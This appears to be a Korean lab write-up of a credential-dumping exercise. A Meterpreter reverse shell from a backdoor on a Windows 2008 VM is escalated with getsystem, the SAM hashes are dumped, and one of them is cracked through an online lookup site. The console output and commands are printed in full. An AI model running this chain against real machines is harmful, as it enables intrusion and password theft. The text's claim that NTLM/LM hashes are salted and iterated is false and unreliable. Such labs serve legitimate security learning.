패스워드 해시 덤프 ( password the hash dump )

- 사용 시스템 

KaliLinux

Window 2008

- 선수 작업

(kali) reverse_resource2.rc , (win2008) backdoor.exe ->  http://5log.tistory.com/120

(Windows 2008) 사용자 만들기 

시작 > 관리도구 > 로컬 보안 정책 > 보안 설정 > 계정 정책 > 암호 정책 >

"암호는 복잡성을 만족해야 함 " 부분을 "사용 안 함" 으로 설정

 

시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 > 

"test / 123 " 사용자 생성

- 실습 

(kali)

# cd /root/bin

# msfconsole -r reverse_resource2.rc

(window 2008)

backdoor.exe 실행

(kali)

[*] Started reverse TCP handler on 192.168.27.50:4444  [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (1189423 bytes) to 192.168.27.201 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.201:49343) at 2017-11-11 22:44:13 +0900 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > help Priv: Password database Commands ================================     Command       Description     -------       -----------     hashdump      Dumps the contents of the SAM database meterpreter > getuid Server username: WIN2008\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a7d6a554ca65eb23d7e29ff5ca669fc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: test:1001:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678::: meterpreter >  meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.201 - Meterpreter session 1 closed.  Reason: User exit

- 패스워드 크랙

SAM 파일로 부터 추출된 패스워드 해시를 크랙하는 툴

john the ripper    pwdump    raindow crack

(윈도우 해쉬) 윈도우는 가장 안전한 방법으로 해시를 만든다. NTLM/LM 해시

MD5는 패스워드와 salt 값을 해시 알고리즘에 넣어 값을 얻어낸다. 

NTLM / LM 은 MD5와 같이 패스워드와 salt 값을 해시 알고리즘을 통해 값을 알아내지만 그 값 또한 해시 알고리즘을 통해 또 다른 값을 얻어낸다. 이런 과정을 랜덤 횟수로 반복하여 설정한다. ( 복잡하고 거쳐야하는 횟수 증가 )

실습에서는 간단히 사이트에서 확인

사이트 - http://www.md5decrypter.co.uk

> 패스워드가 123임을 확인 가능